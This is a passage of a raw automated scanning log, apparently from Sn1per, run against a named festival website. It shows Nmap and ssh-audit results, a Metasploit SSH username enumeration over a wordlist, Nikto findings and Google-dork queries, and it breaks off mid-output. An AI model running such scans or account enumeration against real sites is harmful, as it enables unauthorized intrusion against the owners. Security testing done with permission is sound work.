2734. (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
2735. (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
2736. (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
2737. `- [info] default cipher since OpenSSH 6.9.
2738.  
2739. # message authentication code algorithms
2740. (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
2741. `- [info] available since OpenSSH 6.2
2742. (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
2743. (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
2744. (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
2745. (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
2746. `- [info] available since OpenSSH 6.2
2747. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2748. `- [warn] using small 64-bit tag size
2749. `- [info] available since OpenSSH 4.7
2750. (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
2751. `- [info] available since OpenSSH 6.2
2752. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2753. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2754. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2755. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2756. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2757. `- [warn] using weak hashing algorithm
2758. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2759.  
2760. # algorithm recommendations (for OpenSSH 7.4)
2761. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2762. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
2763. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
2764. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2765. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2766. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
2767. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
2768. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
2769. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
2770. (rec) -blowfish-cbc -- enc algorithm to remove
2771. (rec) -3des-cbc -- enc algorithm to remove
2772. (rec) -aes256-cbc -- enc algorithm to remove
2773. (rec) -cast128-cbc -- enc algorithm to remove
2774. (rec) -aes192-cbc -- enc algorithm to remove
2775. (rec) -aes128-cbc -- enc algorithm to remove
2776. (rec) -hmac-sha2-512 -- mac algorithm to remove
2777. (rec) -umac-128@openssh.com -- mac algorithm to remove
2778. (rec) -hmac-sha2-256 -- mac algorithm to remove
2779. (rec) -umac-64@openssh.com -- mac algorithm to remove
2780. (rec) -hmac-sha1 -- mac algorithm to remove
2781. (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
2782. (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
2783.  
2784.  
2785. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 12:13 EST
2786. NSE: [ssh-run] Failed to specify credentials and command to run.
2787. Nmap scan report for novalisfestival.com (185.119.174.103)
2788. Host is up (0.097s latency).
2789. Other addresses for novalisfestival.com (not scanned): 2a01:9cc0:0:1:1a:3:0:11c
2790. rDNS record for 185.119.174.103: web564.webfaction.com
2791.  
2792. PORT STATE SERVICE VERSION
2793. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2794. | ssh-auth-methods:
2795. |_ Supported authentication methods: false
2796. |_ssh-brute: Password authenication not allowed
2797. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
2798. |_ssh-run: Failed to specify credentials and command to run.
2799. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2800. Device type: general purpose
2801. Running: Linux 3.X|4.X
2802. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
2803. OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8
2804. Network Distance: 11 hops
2805.  
2806. TRACEROUTE (using port 22/tcp)
2807. HOP RTT ADDRESS
2808. 1 0.88 ms 192.168.1.254
2809. 2 8.98 ms 10.135.18.1
2810. 3 30.66 ms 75.154.223.222
2811. 4 30.51 ms lag-113.ear3.NewYork1.Level3.net (4.15.212.245)
2812. 5 97.71 ms ae-227-3603.edge3.London15.Level3.net (4.69.167.98)
2813. 6 97.47 ms ae-225-3601.edge3.London15.Level3.net (4.69.167.90)
2814. 7 102.46 ms 212.187.195.54
2815. 8 100.73 ms 185.52.26.128
2816. 9 ... 10
2817. 11 96.63 ms web564.webfaction.com (185.119.174.103)
2818.  
2819. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2820. Nmap done: 1 IP address (1 host up) scanned in 156.81 seconds
2821.  +-------------------------------------------------------+
2822. | METASPLOIT by Rapid7 |
2823. +---------------------------+---------------------------+
2824. | __________________ | |
2825. | ==c(______(o(______(_() | |""""""""""""|======[*** |
2826. | )=\ | | EXPLOIT \ |
2827. | // \\ | |_____________\_______ |
2828. | // \\ | |==[msf >]============\ |
2829. | // \\ | |______________________\ |
2830. | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
2831. | // \\ | ********************* |
2832. +---------------------------+---------------------------+
2833. | o O o | \'\/\/\/'/ |
2834. | o O | )======( |
2835. | o | .' LOOT '. |
2836. | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
2837. | | PAYLOAD |""\___, | / (_||_ \ |
2838. | |________________|__|)__| | | __||_) | |
2839. | |(@)(@)"""**|(@)(@)**|(@) | " || " |
2840. | = = = = = = = = = = = = | '--------------' |
2841. +---------------------------+---------------------------+
2842. 
2843.  
2844. =[ metasploit v4.16.28-dev ]
2845. + -- --=[ 1716 exploits - 985 auxiliary - 300 post ]
2846. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
2847. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
2848.  
2849. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2850. RHOSTS => novalisfestival.com
2851. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
2852. RHOST => novalisfestival.com
2853. [*] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - Checking for false positives
2854. [*] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - Starting scan
2855. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'admin' not found
2856. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'administrator' on could not connect
2857. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'anonymous' on could not connect
2858. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'backup' on could not connect
2859. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'bee' not found
2860. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'ftp' not found
2861. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'guest' on could not connect
2862. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'GUEST' on could not connect
2863. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'info' on could not connect
2864. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'mail' on could not connect
2865. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'mailadmin' on could not connect
2866. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'msfadmin' on could not connect
2867. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'mysql' on could not connect
2868. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'nobody' not found
2869. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'oracle' not found
2870. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'owaspbwa' on could not connect
2871. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'postfix' on could not connect
2872. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'postgres' on could not connect
2873. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'private' on could not connect
2874. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'proftpd' on could not connect
2875. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'public' on could not connect
2876. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'root' on could not connect
2877. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'superadmin' on could not connect
2878. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'support' on could not connect
2879. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'sys' on could not connect
2880. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'system' on could not connect
2881. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'systemadmin' on could not connect
2882. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'systemadministrator' on could not connect
2883. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'test' on could not connect
2884. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'tomcat' on could not connect
2885. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'user' not found
2886. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'webmaster' not found
2887. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'www-data' not found
2888. [-] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH - User 'Fortimanager_Access' on could not connect
2889. [*] Scanned 1 of 2 hosts (50% complete)
2890. [*] 185.119.174.103:22 - SSH - Checking for false positives
2891. [*] 185.119.174.103:22 - SSH - Starting scan
2892. [-] 185.119.174.103:22 - SSH - User 'admin' on could not connect
2893. [-] 185.119.174.103:22 - SSH - User 'administrator' on could not connect
2894. [-] 185.119.174.103:22 - SSH - User 'anonymous' on could not connect
2895. [-] 185.119.174.103:22 - SSH - User 'backup' on could not connect
2896. [-] 185.119.174.103:22 - SSH - User 'bee' on could not connect
2897. [-] 185.119.174.103:22 - SSH - User 'ftp' on could not connect
2898. [-] 185.119.174.103:22 - SSH - User 'guest' on could not connect
2899. [-] 185.119.174.103:22 - SSH - User 'GUEST' on could not connect
2900. [-] 185.119.174.103:22 - SSH - User 'info' on could not connect
2901. [-] 185.119.174.103:22 - SSH - User 'mail' on could not connect
2902. [-] 185.119.174.103:22 - SSH - User 'mailadmin' on could not connect
2903. [-] 185.119.174.103:22 - SSH - User 'msfadmin' on could not connect
2904. [-] 185.119.174.103:22 - SSH - User 'mysql' on could not connect
2905. [-] 185.119.174.103:22 - SSH - User 'nobody' on could not connect
2906. [-] 185.119.174.103:22 - SSH - User 'oracle' on could not connect
2907. [-] 185.119.174.103:22 - SSH - User 'owaspbwa' on could not connect
2908. [-] 185.119.174.103:22 - SSH - User 'postfix' on could not connect
2909. [-] 185.119.174.103:22 - SSH - User 'postgres' on could not connect
2910. [-] 185.119.174.103:22 - SSH - User 'private' on could not connect
2911. [-] 185.119.174.103:22 - SSH - User 'proftpd' on could not connect
2912. [-] 185.119.174.103:22 - SSH - User 'public' on could not connect
2913. [-] 185.119.174.103:22 - SSH - User 'root' on could not connect
2914. [-] 185.119.174.103:22 - SSH - User 'superadmin' on could not connect
2915. [-] 185.119.174.103:22 - SSH - User 'support' on could not connect
2916. [-] 185.119.174.103:22 - SSH - User 'sys' on could not connect
2917. [-] 185.119.174.103:22 - SSH - User 'system' on could not connect
2918. [-] 185.119.174.103:22 - SSH - User 'systemadmin' on could not connect
2919. [-] 185.119.174.103:22 - SSH - User 'systemadministrator' on could not connect
2920. [-] 185.119.174.103:22 - SSH - User 'test' on could not connect
2921. [-] 185.119.174.103:22 - SSH - User 'tomcat' on could not connect
2922. [-] 185.119.174.103:22 - SSH - User 'user' on could not connect
2923. [-] 185.119.174.103:22 - SSH - User 'webmaster' on could not connect
2924. [-] 185.119.174.103:22 - SSH - User 'www-data' on could not connect
2925. [-] 185.119.174.103:22 - SSH - User 'Fortimanager_Access' on could not connect
2926. [*] Scanned 2 of 2 hosts (100% complete)
2927. [*] Auxiliary module execution completed
2928. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
2929. [+] 2a01:9cc0:0:1:1a:3:0:11c:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
2930. [*] novalisfestival.com:22 - Scanned 1 of 2 hosts (50% complete)
2931. [*] novalisfestival.com:22 - Scanned 2 of 2 hosts (100% complete)
2932. [*] Auxiliary module execution completed
2933.  + -- --=[Port 23 closed... skipping.
2934.  + -- --=[Port 25 closed... skipping.
2935.  + -- --=[Port 53 closed... skipping.
2936.  + -- --=[Port 79 closed... skipping.
2937.  + -- --=[Port 80 opened... running tests...
2938.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
2939.  
2940. ^ ^
2941. _ __ _ ____ _ __ _ _ ____
2942. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2943. | V V // o // _/ | V V // 0 // 0 // _/
2944. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2945. <
2946. ...'
2947.  
2948. WAFW00F - Web Application Firewall Detection Tool
2949.  
2950. By Sandro Gauci && Wendel G. Henrique
2951.  
2952. Checking http://novalisfestival.com
2953. Generic Detection results:
2954. No WAF detected by the generic detection
2955. Number of requests: 13
2956.  
2957.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
2958. http://novalisfestival.com [301 Moved Permanently] HTTPServer[nginx], IP[185.119.174.103], RedirectLocation[http://www.novalisfestival.com/], Title[301 Moved Permanently], nginx
2959. http://www.novalisfestival.com/ [301 Moved Permanently] HTTPServer[nginx], IP[185.119.174.103], RedirectLocation[https://www.novalisfestival.com/], Title[301 Moved Permanently], nginx
2960. https://www.novalisfestival.com/ [200 OK] Email[info@novalisfestival.com], HTML5, HTTPServer[nginx], IP[185.119.174.103], JQuery[1.12.4], Lightbox, MetaGenerator[WordPress 4.9.1], PoweredBy[WordPress], Script[text/javascript], Title[NOVALIS MUSIC + art festival &#8211; 07.07. &#8211; 14.07.2018], UncommonHeaders[link], WordPress[4.9.1], nginx
2961.  
2962.  __ ______ _____ 
2963.  \ \/ / ___|_ _|
2964.  \ /\___ \ | | 
2965.  / \ ___) || | 
2966.  /_/\_|____/ |_| 
2967.  
2968. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
2969. + -- --=[Target: novalisfestival.com:80
2970. + -- --=[Site not vulnerable to Cross-Site Tracing!
2971. + -- --=[Site not vulnerable to Host Header Injection!
2972. + -- --=[Site vulnerable to Cross-Frame Scripting!
2973. + -- --=[Site vulnerable to Clickjacking!
2974.  
2975. HTTP/1.1 405 Not Allowed
2976. Server: nginx
2977. Date: Fri, 05 Jan 2018 17:52:51 GMT
2978. Content-Type: text/html
2979. Content-Length: 166
2980. Connection: close
2981.  
2982. <html>
2983. <head><title>405 Not Allowed</title></head>
2984. <body bgcolor="white">
2985. <center><h1>405 Not Allowed</h1></center>
2986. <hr><center>nginx</center>
2987. </body>
2988. </html>
2989. 
2990. HTTP/1.1 301 Moved Permanently
2991. Server: nginx
2992. Date: Fri, 05 Jan 2018 17:52:51 GMT
2993. Content-Type: text/html; charset=iso-8859-1
2994. Content-Length: 239
2995. Connection: keep-alive
2996. Location: http://www.novalisfestival.com/
2997.  
2998. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
2999. <html><head>
3000. <title>301 Moved Permanently</title>
3001. </head><body>
3002. <h1>Moved Permanently</h1>
3003. <p>The document has moved <a href="http://www.novalisfestival.com/">here</a>.</p>
3004. </body></html>
3005. 
3006.  
3007.  
3008.  
3009.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
3010. + -- --=[Checking if X-Content options are enabled on novalisfestival.com... 
3011.  
3012. + -- --=[Checking if X-Frame options are enabled on novalisfestival.com... 
3013.  
3014. + -- --=[Checking if X-XSS-Protection header is enabled on novalisfestival.com... 
3015.  
3016. + -- --=[Checking HTTP methods on novalisfestival.com... 
3017.  
3018. + -- --=[Checking if TRACE method is enabled on novalisfestival.com... 
3019.  
3020. + -- --=[Checking for META tags on novalisfestival.com... 
3021.  
3022. + -- --=[Checking for open proxy on novalisfestival.com... 
3023. <li>You created a new website record without the current subdomain (for example, <code>www</code>). Return to the control panel to add the current subdomain to the website record and refresh.</li>
3024. <li>You added a new domain in the control panel but didn&#8217;t create a site record to link it with an application. Create a website record with the control panel and refresh.</li>
3025. <li>Your website record is set for <span class="caps">HTTPS</span>, but you visited a <span class="caps">HTTP URL</span> (or vice-versa). Open the <span class="caps">URL</span> with the other protocol.</li>
3026. <li>You tried to access your website by <span class="caps">IP</span> address. Access the website by domain name instead.</li>
3027. <li>There is a problem with your account. Check the control panel for unresolved support tickets and check your email for recent messages from support@webfaction.com.</li>
3028. </ul>
3029. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
3030. <p id="outro">WebFaction provides modern hosting with friendly customer support. Visit our <a href="http://www.webfaction.com/">main website</a> for more information.</p>
3031. </body>
3032. </html>
3033.  
3034. + -- --=[Enumerating software on novalisfestival.com... 
3035. Server: nginx
3036.  
3037. + -- --=[Checking if Strict-Transport-Security is enabled on novalisfestival.com... 
3038.  
3039. + -- --=[Checking for Flash cross-domain policy on novalisfestival.com... 
3040. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3041. <html><head>
3042. <title>301 Moved Permanently</title>
3043. </head><body>
3044. <h1>Moved Permanently</h1>
3045. <p>The document has moved <a href="http://www.novalisfestival.com/crossdomain.xml">here</a>.</p>
3046. </body></html>
3047.  
3048. + -- --=[Checking for Silverlight cross-domain policy on novalisfestival.com... 
3049. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3050. <html><head>
3051. <title>301 Moved Permanently</title>
3052. </head><body>
3053. <h1>Moved Permanently</h1>
3054. <p>The document has moved <a href="http://www.novalisfestival.com/clientaccesspolicy.xml">here</a>.</p>
3055. </body></html>
3056.  
3057. + -- --=[Checking for HTML5 cross-origin resource sharing on novalisfestival.com... 
3058.  
3059. + -- --=[Retrieving robots.txt on novalisfestival.com... 
3060. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3061. <html><head>
3062. <title>301 Moved Permanently</title>
3063. </head><body>
3064. <h1>Moved Permanently</h1>
3065. <p>The document has moved <a href="http://www.novalisfestival.com/robots.txt">here</a>.</p>
3066. </body></html>
3067.  
3068. + -- --=[Retrieving sitemap.xml on novalisfestival.com... 
3069. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3070. <html><head>
3071. <title>301 Moved Permanently</title>
3072. </head><body>
3073. <h1>Moved Permanently</h1>
3074. <p>The document has moved <a href="http://www.novalisfestival.com/sitemap.xml">here</a>.</p>
3075. </body></html>
3076.  
3077. + -- --=[Checking cookie attributes on novalisfestival.com... 
3078.  
3079. + -- --=[Checking for ASP.NET Detailed Errors on novalisfestival.com... 
3080.  
3081. 
3082.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
3083. - Nikto v2.1.6
3084. ---------------------------------------------------------------------------
3085. + Target IP: 185.119.174.103
3086. + Target Hostname: novalisfestival.com
3087. + Target Port: 80
3088. + Start Time: 2018-01-05 12:52:57 (GMT-5)
3089. ---------------------------------------------------------------------------
3090. + Server: nginx
3091. + The anti-clickjacking X-Frame-Options header is not present.
3092. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
3093. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
3094. + Root page / redirects to: http://www.novalisfestival.com/
3095. + No CGI Directories found (use '-C all' to force check all possible dirs)
3096. + Server leaks inodes via ETags, header found with file /, fields: 0x588be613 0xcd2
3097. + 7445 requests: 0 error(s) and 4 item(s) reported on remote host
3098. + End Time: 2018-01-05 13:05:54 (GMT-5) (777 seconds)
3099. ---------------------------------------------------------------------------
3100. + 1 host(s) tested
3101.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
3102. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/novalisfestival.com-port80.jpg
3103.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
3104.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
3105.  
3106.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
3107.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
3108.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
3109.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
3110.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
3111.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
3112.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
3113.  
3114. __[ ! ] Neither war between hackers, nor peace for the system.
3115. __[ ! ] http://blog.inurl.com.br
3116. __[ ! ] http://fb.com/InurlBrasil
3117. __[ ! ] http://twitter.com/@googleinurl
3118. __[ ! ] http://github.com/googleinurl
3119. __[ ! ] Current PHP version::[ 7.0.26-1 ]
3120. __[ ! ] Current script owner::[ root ]
3121. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
3122. __[ ! ] Current pwd::[ /usr/share/sniper ]
3123. __[ ! ] Help: php inurlbr.php --help
3124. ------------------------------------------------------------------------------------------------------------------------
3125.  
3126. [ ! ] Starting SCANNER INURLBR 2.1 at [05-01-2018 14:22:46]
3127. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
3128. It is the end user's responsibility to obey all applicable local, state and federal laws.
3129. Developers assume no liability and are not responsible for any misuse or damage caused by this program
3130.  
3131. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-novalisfestival.com.txt ]
3132. [ INFO ][ DORK ]::[ site:novalisfestival.com ]
3133. [ INFO ][ SEARCHING ]:: {
3134. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ma ]
3135.  
3136. [ INFO ][ SEARCHING ]:: 
3137. -[:::]
3138. [ INFO ][ ENGINE ]::[ GOOGLE API ]
3139.  
3140. [ INFO ][ SEARCHING ]:: 
3141. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3142. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.is ID: 006688160405527839966:yhpefuwybre ]
3143.  
3144. [ INFO ][ SEARCHING ]:: 
3145. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3146.  
3147. [ INFO ][ TOTAL FOUND VALUES ]:: [ 23 ]
3148.  
3149. 
3150.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3151. |_[ + ] [ 0 / 23 ]-[14:22:58] [ - ] 
3152. |_[ + ] Target:: [ https://www.novalisfestival.com/ ]
3153. |_[ + ] Exploit:: 
3154. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3155. |_[ + ] More details:: 
3156. |_[ + ] Found:: UNIDENTIFIED
3157. 
3158.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3159. |_[ + ] [ 1 / 23 ]-[14:22:58] [ - ] 
3160. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=47 ]
3161. |_[ + ] Exploit:: 
3162. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3163. |_[ + ] More details:: 
3164. |_[ + ] Found:: UNIDENTIFIED
3165. 
3166.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3167. |_[ + ] [ 2 / 23 ]-[14:23:00] [ - ] 
3168. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=499 ]
3169. |_[ + ] Exploit:: 
3170. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3171. |_[ + ] More details:: 
3172. |_[ + ] Found:: UNIDENTIFIED
3173. 
3174.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3175. |_[ + ] [ 3 / 23 ]-[14:23:01] [ - ] 
3176. |_[ + ] Target:: [ https://www.novalisfestival.com/?cat=4 ]
3177. |_[ + ] Exploit:: 
3178. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3179. |_[ + ] More details:: 
3180. |_[ + ] Found:: UNIDENTIFIED
3181. 
3182.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3183. |_[ + ] [ 4 / 23 ]-[14:23:02] [ - ] 
3184. |_[ + ] Target:: [ https://www.novalisfestival.com/?p=1 ]
3185. |_[ + ] Exploit:: 
3186. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3187. |_[ + ] More details:: 
3188. |_[ + ] Found:: UNIDENTIFIED
3189. 
3190.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3191. |_[ + ] [ 5 / 23 ]-[14:23:03] [ - ] 
3192. |_[ + ] Target:: [ https://www.novalisfestival.com/?p=590 ]
3193. |_[ + ] Exploit:: 
3194. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3195. |_[ + ] More details:: 
3196. |_[ + ] Found:: UNIDENTIFIED
3197. 
3198.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3199. |_[ + ] [ 6 / 23 ]-[14:23:04] [ - ] 
3200. |_[ + ] Target:: [ https://www.novalisfestival.com/?p=808 ]
3201. |_[ + ] Exploit:: 
3202. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3203. |_[ + ] More details:: 
3204. |_[ + ] Found:: UNIDENTIFIED
3205. 
3206.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3207. |_[ + ] [ 7 / 23 ]-[14:23:05] [ - ] 
3208. |_[ + ] Target:: [ https://www.novalisfestival.com/?author=1 ]
3209. |_[ + ] Exploit:: 
3210. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3211. |_[ + ] More details:: 
3212. |_[ + ] Found:: UNIDENTIFIED
3213. 
3214.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3215. |_[ + ] [ 8 / 23 ]-[14:23:06] [ - ] 
3216. |_[ + ] Target:: [ https://www.novalisfestival.com/?p=588 ]
3217. |_[ + ] Exploit:: 
3218. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3219. |_[ + ] More details:: 
3220. |_[ + ] Found:: UNIDENTIFIED
3221. 
3222.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3223. |_[ + ] [ 9 / 23 ]-[14:23:07] [ - ] 
3224. |_[ + ] Target:: [ https://www.novalisfestival.com/?p=932 ]
3225. |_[ + ] Exploit:: 
3226. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3227. |_[ + ] More details:: 
3228. |_[ + ] Found:: UNIDENTIFIED
3229. 
3230.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3231. |_[ + ] [ 10 / 23 ]-[14:23:08] [ - ] 
3232. |_[ + ] Target:: [ https://www.novalisfestival.com/?cat=1 ]
3233. |_[ + ] Exploit:: 
3234. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3235. |_[ + ] More details:: 
3236. |_[ + ] Found:: UNIDENTIFIED
3237. 
3238.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3239. |_[ + ] [ 11 / 23 ]-[14:23:09] [ - ] 
3240. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=44 ]
3241. |_[ + ] Exploit:: 
3242. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3243. |_[ + ] More details:: 
3244. |_[ + ] Found:: UNIDENTIFIED
3245. 
3246.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3247. |_[ + ] [ 12 / 23 ]-[14:23:10] [ - ] 
3248. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=8 ]
3249. |_[ + ] Exploit:: 
3250. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3251. |_[ + ] More details:: 
3252. |_[ + ] Found:: UNIDENTIFIED
3253. 
3254.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3255. |_[ + ] [ 13 / 23 ]-[14:23:11] [ - ] 
3256. |_[ + ] Target:: [ https://www.novalisfestival.com/?p=788 ]
3257. |_[ + ] Exploit:: 
